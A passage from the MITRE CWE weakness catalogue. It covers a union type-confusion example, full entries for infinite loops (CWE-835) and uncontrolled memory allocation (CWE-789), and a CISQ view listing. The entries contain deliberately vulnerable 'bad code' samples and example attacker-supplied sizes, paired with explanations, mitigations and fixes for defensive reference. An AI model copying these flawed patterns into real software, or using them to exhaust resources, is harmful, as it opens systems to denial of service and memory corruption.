printf("Pointer of buf.name is %p\n", buf.name);
/* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */

buf.nameID = (int)(defaultMessage + 1);
printf("Pointer of buf.name is now %p\n", buf.name);
if (buf.msgType == NAME_TYPE) {

printf("Message: %s\n", buf.name);

}
else {

printf("Message: Use ID %d\n", buf.nameID);

}

The code intends to process the message as a NAME_TYPE, and sets the default message to "Hello World." However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation.

As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string.

Execution of the program might generate output such as:

Pointer of name is 10830

Pointer of name is now 10831

Message: ello World

Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified.

In this case, the first "H" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes.

Selected Observed Examples

Reference	Description
CVE-2021-43537	Chain: in a web browser, an unsigned 64-bit integer is forcibly cast to a 32-bit integer (CWE-681) and potentially leading to an integer overflow (CWE-190). If an integer overflow occurs, this can cause heap memory corruption (CWE-122)
CVE-2022-3979	Chain: data visualization program written in PHP uses the "!=" operator instead of the type-strict "!==" operator (CWE-480) when validating hash values, potentially leading to an incorrect type conversion (CWE-704)

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Fuzzing

Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues.

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	737	CERT C Secure Coding Standard (2008) Chapter 4 - Expressions (EXP)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	741	CERT C Secure Coding Standard (2008) Chapter 8 - Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	747	CERT C Secure Coding Standard (2008) Chapter 14 - Miscellaneous (MSC)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	875	CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	883	CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	998	SFP Secondary Cluster: Glitch in Computation
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1129	CISQ Quality Measures (2016) - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1157	SEI CERT C Coding Standard - Guidelines 03. Expressions (EXP)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1158	SEI CERT C Coding Standard - Guidelines 04. Integers (INT)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1161	SEI CERT C Coding Standard - Guidelines 07. Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1306	CISQ Quality Measures - Reliability
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1416	Comprehensive Categorization: Resource Lifecycle Management

Vulnerability Mapping Notes

Usage	ALLOWED-WITH-REVIEW (this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review)
Reason	Abstraction
Rationale	This CWE entry is a Class and might have Base-level children that would be more appropriate
Comments	Examine children of this entry to see if there is a better fit

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
CERT C Secure Coding	EXP05-C		Do not cast away a const qualification
CERT C Secure Coding	EXP39-C	CWE More Abstract	Do not access a variable through a pointer of an incompatible type
CERT C Secure Coding	INT31-C	CWE More Abstract	Ensure that integer conversions do not result in lost or misinterpreted data
CERT C Secure Coding	INT36-C	CWE More Abstract	Converting a pointer to integer or integer to pointer
CERT C Secure Coding	STR34-C	CWE More Abstract	Cast characters to unsigned types before converting to larger integer sizes
CERT C Secure Coding	STR37-C	CWE More Abstract	Arguments to character handling functions must be representable as an unsigned char
Software Fault Patterns	SFP1		Glitch in computation
OMG ASCRM	ASCRM-CWE-704

References

[REF-961]

Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". ASCRM-CWE-704. 2016-01.
<http://www.omg.org/spec/ASCRM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2008-09-09 (CWE 1.0, 2008-09-09)	CWE Content Team	MITRE
2008-09-09 (CWE 1.0, 2008-09-09)	Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0.
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Weakness_Ordinalities
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Observed_Examples
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Demonstrative_Examples, Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships, Time_of_Introduction
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Taxonomy_Mappings
2017-01-19	CWE Content Team	MITRE
2017-01-19	updated Relationships
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Relationships, Taxonomy_Mappings
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Description
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Relationships, Taxonomy_Mappings
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction

Weakness ID: 835

View customized information:

Description

The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.

Common Consequences

Impact	Details
DoS: Resource Consumption (CPU); DoS: Resource Consumption (Memory); DoS: Amplification	Scope: Availability An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software's operation may slow down, or cause a long time to respond.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	834	Excessive Iteration
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1322	Use of Blocking Code in Single-threaded, Non-blocking Context

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	438	Behavioral Problems

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	834	Excessive Iteration

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence)
Technologies	Class: Not Technology-Specific (Undetermined Prevalence)

Demonstrative Examples

Example 1

In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails.

(bad code)

Example Language: C

int processMessagesFromServer(char *hostaddr, int port) {

...
int servsock;
int connected;
struct sockaddr_in servaddr;

// create socket to connect to server
servsock = socket( AF_INET, SOCK_STREAM, 0);
memset( &servaddr, 0, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
servaddr.sin_addr.s_addr = inet_addr(hostaddr);

do {

// establish connection to server
connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr));

// if connected then read and process messages from server
if (connected > -1) {

// read and process messages
...

}

// keep trying to establish connection to the server
} while (connected < 0);

// close socket and return success or failure
...

}

However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code.

(good code)

Example Language: C

int processMessagesFromServer(char *hostaddr, int port) {

...
// initialize number of attempts counter
int count = 0;
do {

// establish connection to server
connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr));

// increment counter
count++;

// if connected then read and process messages from server
if (connected > -1) {

// read and process messages
...

}

// keep trying to establish connection to the server

// up to a maximum number of attempts
} while (connected < 0 && count < MAX_ATTEMPTS);

// close socket and return success or failure
...

}

Example 2

For this example, the method isReorderNeeded is part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold.

(bad code)

Example Language: Java

public boolean isReorderNeeded(String bookISBN, int rateSold) {

boolean isReorder = false;

int minimumCount = 10;
int days = 0;

// get inventory count for book
int inventoryCount = inventory.getIventoryCount(bookISBN);

// find number of days until inventory count reaches minimum
while (inventoryCount > minimumCount) {

inventoryCount = inventoryCount - rateSold;
days++;

}

// if number of days within reorder timeframe

// set reorder return boolean to true
if (days > 0 && days < 5) {

isReorder = true;

}

return isReorder;

}

However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop, as in the following code.

(good code)

Example Language: Java

public boolean isReorderNeeded(String bookISBN, int rateSold) {

...

// validate rateSold variable
if (rateSold < 1) {

return isReorder;

}

...

}

Selected Observed Examples

Reference	Description
CVE-2022-22224	Chain: an operating system does not properly process malformed Open Shortest Path First (OSPF) Type/Length/Value Identifiers (TLV) (CWE-703), which can cause the process to enter an infinite loop (CWE-835)
CVE-2022-25304	A Python machine communication platform did not account for receiving a malformed packet with a null size, causing the receiving function to never update the message buffer and be caught in an infinite loop.
CVE-2011-1027	Chain: off-by-one error (CWE-193) leads to infinite loop (CWE-835) using invalid hex-encoded characters.
CVE-2011-1142	Chain: self-referential values in recursive definitions lead to infinite loop.
CVE-2011-1002	NULL UDP packet is never cleared from a queue, leading to infinite loop.
CVE-2006-6499	Chain: web browser crashes due to infinite loop - "bad looping logic [that relies on] floating point math [CWE-1339] to exit the loop [CWE-835]"
CVE-2010-4476	Floating point conversion routine cycles back and forth between two different values.
CVE-2010-4645	Floating point conversion routine cycles back and forth between two different values.
CVE-2010-2534	Chain: improperly clearing a pointer in a linked list leads to infinite loop.
CVE-2013-1591	Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.
CVE-2008-3688	Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1306	CISQ Quality Measures - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1410	Comprehensive Categorization: Insufficient Control Flow Management

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
OMG ASCSM	ASCSM-CWE-835

References

[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 7, "Looping Constructs", Page 327. 1st Edition. Addison Wesley. 2006.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-835. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2011-03-22 (CWE 1.12, 2011-03-30)	CWE Content Team	MITRE
2011-03-22 (CWE 1.12, 2011-03-30)
Contributions
Contribution Date	Contributor	Organization
2024-09-29 (CWE 4.16, 2024-11-19)	Abhi Balakrishnan
2024-09-29 (CWE 4.16, 2024-11-19)	Contributed usability diagram concepts used by the CWE team
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Detection_Factors, Time_of_Introduction, Weakness_Ordinalities
2024-11-19 (CWE 4.16, 2024-11-19)	CWE Content Team	MITRE
2024-11-19 (CWE 4.16, 2024-11-19)	updated Description, Diagram
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Demonstrative_Examples
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description, Observed_Examples
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Observed_Examples
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Observed_Examples
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Observed_Examples, Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Demonstrative_Examples
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings

Weakness ID: 789

View customized information:

Description

The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.

Alternate Terms

Stack Exhaustion

When a weakness allocates excessive memory on the stack, it is often described as "stack exhaustion," which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325.

Common Consequences

Impact	Details
DoS: Resource Consumption (Memory)	Scope: Availability Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system.

Potential Mitigations

Phase(s)	Mitigation
Implementation; Architecture and Design	Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary.
Operation	Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	770	Allocation of Resources Without Limits or Throttling
PeerOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1325	Improperly Controlled Sequential Memory Allocation
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	129	Improper Validation of Array Index
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1284	Improper Validation of Specified Quantity in Input
CanPrecede	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	476	NULL Pointer Dereference

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

C (Undetermined Prevalence)

C++ (Undetermined Prevalence)

Class: Not Language-Specific (Undetermined Prevalence)

Demonstrative Examples

Example 1

Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size.

(bad code)

Example Language: C

unsigned int size = GetUntrustedInt();
/* ignore integer overflow (CWE-190) for this example */

unsigned int totBytes = size * sizeof(char);
char *string = (char *)malloc(totBytes);
InitializeString(string);

Suppose an attacker provides a size value of:

12345678

This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string.

Example 2

Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap.

(bad code)

Example Language: Java

unsigned int size = GetUntrustedInt();
HashMap list = new HashMap(size);

The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError.

Example 3

This code performs a stack allocation based on a length calculation.

(bad code)

Example Language: C

int a = 5, b = 6;
size_t len = a - b;
char buf[len]; // Just blows up the stack

}

Since a and b are declared as signed ints, the "a - b" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer's memory space.

Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker's input to attain the negative value.

Example 4

This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action.

(bad code)

Example Language: C

int proc_msg(char *s, int msg_len)
{

// Note space at the end of the string - assume all strings have preamble with space
int pre_len = sizeof("preamble: ");
char buf[pre_len - msg_len];
... Do processing here if we get this far

}
char *s = "preamble: message\n";
char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space)
int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length
int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack

The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations.

Example 5

The following code obtains an untrusted number that is used as an index into an array of messages.

(bad code)

Example Language: Perl

my $num = GetUntrustedNumber();
my @messages = ();

$messages[$num] = "Hello World";

The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works.

If $num is a large value such as 2147483648 (1<<31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as:

Out of memory during array extend

This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system.

Example 6

This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations.

(bad code)

Example Language: C

int proc_msg(char *s, int msg_len)
{

int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space

char buf[pre_len - msg_len];

... Do processing here and set status

return status;

(good code)

Example Language: C

int proc_msg(char *s, int msg_len)
{

int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space

if (pre_len <= msg_len) { // Log error; return error_code; }

char buf[pre_len - msg_len];

... Do processing here and set status

return status;

Selected Observed Examples

Reference	Description
CVE-2019-19911	Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190).
CVE-2010-3701	program uses ::alloca() for encoding messages, but large messages trigger segfault
CVE-2008-1708	memory consumption and daemon exit by specifying a large value in a length field
CVE-2008-0977	large value in a length field leads to memory consumption and crash when no more memory is available
CVE-2006-3791	large key size in game program triggers crash when a resizing function cannot allocate enough memory
CVE-2004-2589	large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method	Details
Fuzzing	Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. Effectiveness: High
Automated Static Analysis	Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) Effectiveness: High
Automated Dynamic Analysis	Use tools that are integrated during compilation to insert runtime error-checking mechanisms related to memory safety errors, such as AddressSanitizer (ASan) for C/C++ [REF-1518]. Effectiveness: Moderate Note:Crafted inputs are necessary to reach the code containing the error, such as generated by fuzzers. Also, these tools may reduce performance, and they only report the error condition - not the original mistake that led to the error.

Functional Areas

Memory Management

Affected Resources

Memory

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1162	SEI CERT C Coding Standard - Guidelines 08. Memory Management (MEM)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1179	SEI CERT Perl Coding Standard - Guidelines 01. Input Validation and Data Sanitization (IDS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1399	Comprehensive Categorization: Memory Safety

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Relationship

This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated.

Applicable Platform

Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
WASC	35		SOAP Array Abuse
CERT C Secure Coding	MEM35-C	Imprecise	Allocate sufficient memory for an object
SEI CERT Perl Coding Standard	IDS32-PL	Imprecise	Validate any integer that is used as an array index
OMG ASCSM	ASCSM-CWE-789

References

[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 10, "Resource Limits", Page 574. 1st Edition. Addison Wesley. 2006.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-789. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1518]	"AddressSanitizer". <https://clang.llvm.org/docs/AddressSanitizer.html>. (URL validated: 2025-12-10)

Content History

Submissions
Submission Date	Submitter	Organization
2009-10-21 (CWE 1.6, 2009-10-29)	CWE Content Team	MITRE
2009-10-21 (CWE 1.6, 2009-10-29)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Detection_Factors, References
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Affected_Resources, Functional_Areas, Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated Observed_Examples
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Demonstrative_Examples, Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated References
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Common_Consequences, Observed_Examples
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2020-12-10	Uncontrolled Memory Allocation

Common Weakness Enumeration

CWE VIEW: CISQ Quality Measures (2016)

View Components

CWE-788: Access of Memory Location After End of Buffer

Edit Custom Filter

CWE-1044: Architecture with Number of Horizontal Layers Outside of Expected Range

Edit Custom Filter

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Edit Custom Filter

CWE CATEGORY: CISQ Quality Measures (2016) - Maintainability

CWE CATEGORY: CISQ Quality Measures (2016) - Performance Efficiency

CWE CATEGORY: CISQ Quality Measures (2016) - Reliability

CWE CATEGORY: CISQ Quality Measures (2016) - Security

CWE-1082: Class Instance Self Destruction Control Element

Edit Custom Filter

CWE-1086: Class with Excessive Number of Child Classes

Edit Custom Filter

CWE-1074: Class with Excessively Deep Inheritance

Edit Custom Filter

CWE-1087: Class with Virtual Method without a Virtual Destructor

Edit Custom Filter

CWE-1063: Creation of Class Instance within a Static Code Block

Edit Custom Filter

CWE-1046: Creation of Immutable Text Using String Concatenation

Edit Custom Filter

CWE-766: Critical Data Element Declared Public

Edit Custom Filter

CWE-1083: Data Access from Outside Expected Data Manager Component

Edit Custom Filter

CWE-1057: Data Access Operations Outside of Expected Data Manager Component

Edit Custom Filter

CWE-1043: Data Element Aggregating an Excessively Large Number of Non-Primitive Elements

Edit Custom Filter

CWE-1098: Data Element containing Pointer Item without Proper Copy Control Element

Edit Custom Filter

CWE-1072: Data Resource Access without Use of Connection Pooling

Edit Custom Filter

CWE-561: Dead Code

Edit Custom Filter

CWE-396: Declaration of Catch for Generic Exception

Edit Custom Filter

CWE-397: Declaration of Throws for Generic Exception

Edit Custom Filter

CWE-1069: Empty Exception Block

Edit Custom Filter

CWE-1049: Excessive Data Query Operations in a Large Data Table

Edit Custom Filter

CWE-1067: Excessive Execution of Sequential Searches of Data Resource

Edit Custom Filter

CWE-1094: Excessive Index Range Scan for a Data Resource

Edit Custom Filter

CWE-1121: Excessive McCabe Cyclomatic Complexity

Edit Custom Filter

CWE-1060: Excessive Number of Inefficient Server-Side Data Accesses

Edit Custom Filter

CWE-1050: Excessive Platform Resource Consumption within a Loop

Edit Custom Filter

CWE-1052: Excessive Use of Hard-Coded Literals in Initialization

Edit Custom Filter

CWE-1077: Floating Point Comparison with Incorrect Operator

Edit Custom Filter

CWE-99: Improper Control of Resource Identifiers ('Resource Injection')

Edit Custom Filter

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Edit Custom Filter

CWE-667: Improper Locking

Edit Custom Filter

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Edit Custom Filter

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Edit Custom Filter

